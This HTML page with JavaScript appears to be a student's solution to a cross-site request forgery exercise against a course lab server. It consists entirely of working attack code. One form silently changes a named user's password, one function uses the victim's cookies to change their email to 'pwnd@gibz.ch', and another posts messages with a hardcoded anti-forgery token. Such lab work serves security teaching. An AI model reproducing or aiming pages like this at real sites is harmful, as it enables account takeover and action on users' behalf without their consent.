<body>
    <form action="https://m183.gibz-informatik.ch/api/csrf/changePassword" method="POST">
        <label>Username:</label>
        <input type="text" id="username" name="username" value="DzenisDz" readonly="readonly">
        <br />
        <label>Password:</label>
        <input type="password" id="password" name="password" value="Pa$$w0rd" required>
        <br />
        <input type="submit" value="Submit">
    </form>

    <br />
    <label>E-Mail:</label>
    <input type="hidden" name="csrf" />
    <input id="email" type="email" id="email" name="email" value="pwnd@gibz.ch" required>
    <br />
    <input type="button" onclick="ChangeEMail()" value="Submit">

    <br />
    <label>Message:</label>
    <textarea id="message" name="message" rows="7" cols="50"></textarea>
    <br />
    <input type="button" onclick="PostMessage()" value="Submit">

</body>

<script>
    // try to get the token
    // tried with /csrf
    //var csrf;

    //fetch("https://m183.gibz-informatik.ch/api/authentication/check").then(response => {
    //    csrf = response.json()
    //});

    function ChangeEMail() {
        const payload = {
            "email": document.getElementById("email").value
        };

        fetch("https://m183.gibz-informatik.ch/api/csrf/changeEmail", {
            method: 'POST',
            credentials: "include",
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify(payload),
        });
    }

    function PostMessage() {
        const payload = {
            "csrf": "G4VB9frXqeN5gdbbe3Nu",
            "message": document.getElementById("message").value
        };

        fetch("https://m183.gibz-informatik.ch/api/csrf/postMessage", {
            method: 'POST',
            credentials: "include",
            headers: {
                'Content-Type': 'application/json',
            },
            body: JSON.stringify(payload),
        });
    }
</script>